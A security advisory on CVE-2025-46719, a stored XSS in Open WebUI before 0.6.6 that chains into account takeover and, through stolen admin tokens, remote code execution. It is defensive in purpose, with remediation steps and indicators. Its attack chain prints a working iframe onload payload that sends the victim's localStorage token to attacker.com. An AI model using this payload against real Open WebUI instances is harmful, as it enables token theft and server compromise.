Open WebUI Stored XSS Leads to Account Takeover and RCE (CVE-2025-46719)
A high-severity stored Cross-Site Scripting (XSS) vulnerability, CVE-2025-46719, exists in Open WebUI versions prior to 0.6.6 due to improper rendering of HTML tags in chat messages, specifically an unescaped markdown token in `MarkdownTokens.svelte`. This allows attackers to inject malicious JavaScript into chat transcripts, which executes in a user's browser upon viewing, enabling access token theft, full account takeover, and, if targeting an administrator, Remote Code Execution (RCE) on the backend server via malicious Python functions.
A critical vulnerability, tracked as CVE-2025-46719, affects Open WebUI versions prior to 0.6.6, allowing for stored Cross-Site Scripting (XSS) attacks. The flaw stems from the MarkdownTokens.svelte component, which improperly renders specific HTML tags within chat messages, enabling JavaScript injection. Attackers can embed malicious scripts in chat transcripts that execute when a user views the message, leading to the theft of access tokens and full account compromise. If an administrator account is targeted, the stolen token can be used to achieve Remote Code Execution (RCE) on the Open WebUI backend server by creating functions with arbitrary Python code. This vulnerability is "wormable," as infected chat transcripts can be shared across the same server or uploaded to the public openwebui.com platform, spreading the exploit to other users upon viewing.
Attack Chain
- Attacker crafts a malicious chat message containing an
<iframe>tag with anonloadevent, designed to exfiltrate access tokens (e.g.,<iframe src="http://localhost:8080/api/v1/files/" onload="fetch('https://attacker.com/?token=' + localStorage.getItem('token'))"></iframe>). - The attacker sends this malicious chat message within the Open WebUI application.
- A victim user, potentially an administrator, opens the infected chat transcript, causing the embedded malicious
<iframe>to render. - The malicious JavaScript embedded in the
onloadattribute executes in the victim's browser, fetching and exfiltrating the victim's session access token to the attacker-controlled server. - If the victim was an administrator, the attacker uses the stolen admin access token to authenticate to the Open WebUI backend API.
- The attacker sends a POST request to the
/api/v1/functionsendpoint (e.g.,http://localhost:5174/admin/functions) with a JSON payload containing malicious Python code. - The Open WebUI backend server processes and executes the malicious Python code within the newly created function, leading to Remote Code Execution on the underlying host system.
- The attacker achieves full control over the Open WebUI instance and potentially the underlying server.
Impact
Successful exploitation of CVE-2025-46719 can lead to severe consequences. Users are at risk of full account takeover through stolen access tokens, enabling attackers to impersonate them, access their data, and manipulate their chat history. The wormable nature of the XSS means that merely viewing an infected chat transcript can compromise a user, allowing the attack to spread rapidly, especially if "Enable Community Sharing" is active on openwebui.com. If an administrative account is compromised, the attacker can leverage the RCE capability to execute arbitrary code on the server hosting Open WebUI, potentially gaining full control of the server, exfiltrating sensitive data, or deploying further malware.
Recommendation
- Immediately update Open WebUI installations to version 0.6.6 or newer to remediate CVE-2025-46719.
- Review web server access logs for POST requests to
/api/v1/functionsfrom non-administrative or unexpected sources, as this endpoint is used for RCE. - Monitor network traffic for outbound connections to suspicious or unknown domains from Open WebUI client systems, which could indicate exfiltration of
localStoragetokens as referenced inhttps://attacker.com/?token=. - Educate users on the risks of opening chat transcripts from untrusted sources, especially those containing
<iframe>tags or unusual content, even if the domainhttp://localhost:8080/api/v1/files/is present.
Indicators of compromise
1
domain
5
url
| Type | Value |
|---|---|
| url | https://openwebui.com/c/<user>/<chat_id> |
| url | http://localhost:8080/api/v1/files/ |
| url | https://attacker.com/?token= |
| domain | openwebui.com |
| url | https://github.com/open-webui/open-webui/blob/main/src/lib/components/chat/Messages/Markdown/MarkdownTokens.svelte#L269-L279 |
| url | http://localhost:5174/admin/functions |